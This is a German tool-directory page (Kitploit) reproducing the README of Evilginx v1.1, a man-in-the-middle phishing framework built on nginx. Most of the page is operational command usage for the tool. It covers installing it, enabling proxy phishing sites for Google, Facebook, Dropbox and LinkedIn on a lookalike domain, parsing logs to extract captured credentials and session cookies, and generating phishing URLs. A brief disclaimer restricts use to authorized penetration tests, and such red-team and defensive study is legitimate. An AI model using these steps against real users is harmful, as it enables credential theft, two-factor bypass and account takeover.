Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
evilginx — BITTE VERWENDEN SIE DIE NEUE VERSION: https://github.com/kgretzky/evilginx2 | Kitploit
Tools/GitHubGitHub/kgretzky/evilginx
Phishing-ToolsWebanwendungs-ExploitationPhishingPenetrationstestsSocial EngineeringAuthentifizierungRed Teaming
GitHubkgretzky/evilginx

evilginx

BITTE VERWENDEN SIE DIE NEUE VERSION: https://github.com/kgretzky/evilginx2

Repository anzeigen
1.2k281vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Evilginx v.1.1.0

Evilginx

DIESE VERSION IST VERALTET. BITTE VERWENDEN SIE DIE NEUESTE VERSION!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx ist ein Man-in-the-Middle-Angriffsframework, das zum Phishing von Anmeldedaten und Sitzungscookies beliebiger Webdienste verwendet wird. Sein Kern läuft auf dem HTTP-Server Nginx, der proxy_pass und sub_filter nutzt, um HTTP-Inhalte zu proxen und zu modifizieren, während der Datenverkehr zwischen Client und Server abgefangen wird.

Sie können auf meinem Blog erfahren, wie es funktioniert und wie Sie alles selbst installieren:

Erster Beitrag mittlerweile etwas veraltet: Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 Update: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 Update: Evilginx 1.1 Update

Haftungsausschluss

Mir ist bewusst, dass Evilginx für sehr bösartige Zwecke verwendet werden kann. Diese Arbeit dient lediglich der Demonstration, was fähige Angreifer tun können. Es liegt in der Verantwortung des Verteidigers, solche Angriffe bei der Einrichtung von Verteidigungsmaßnahmen zu berücksichtigen und Wege zu finden, sich vor dieser Phishing-Methode zu schützen. Evilginx sollte nur in legitimen Penetrationstest-Aufträgen mit schriftlicher Erlaubnis der zu phishenden Parteien eingesetzt werden.

Hall of Fame der Mitwirkenden

@poweroftrue

Installation

Evilginx stellt ein Installationsskript install.sh zur Verfügung, das die Installation des gesamten Pakets auf jedem Debian wheezy/jessie-Rechner komfortabel und ohne weiteres Zutun übernimmt.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Verwendung

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
Setup

Aktivieren oder deaktivieren Sie Site-Konfigurationen für die Verwendung mit dem Nginx-Server unter Verwendung der mitgelieferten Evilginx-Vorlagen aus dem Verzeichnis sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

Verfügbare Site-Konfigurationsvorlagen auflisten:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Google-Phishing-Site mit der vorregistrierten Phishing-Domain not-really-google.com aktivieren:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

Facebook-Phishing-Site deaktivieren:

root@kitploit:~
python evilginx.py setup --disable facebook
Parse

Nginx-Logs parsen, um abgefangene Anmeldedaten und Sitzungscookies zu extrahieren. Logs werden standardmäßig im Verzeichnis logs gespeichert, in dem sich das Skript evilginx.py befindet. Dies kann automatisch erfolgen, nachdem Sie die automatische Analyse in der Setup-Phase aktiviert haben.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Logs nur für die Google-Site parsen:

root@kitploit:~
python evilginx.py parse -s google

Logs für alle verfügbaren Sites parsen:

root@kitploit:~
python evilginx.py parse -s all
URL generieren

Phishing-URLs generieren, die Sie in Ihren Red-Team-Assessments verwenden können.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Google-Phishing-URL generieren, die das Opfer nach erfolgreicher Anmeldung auf ein Rick-Roll-Video weiterleitet:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
Tool herunterladen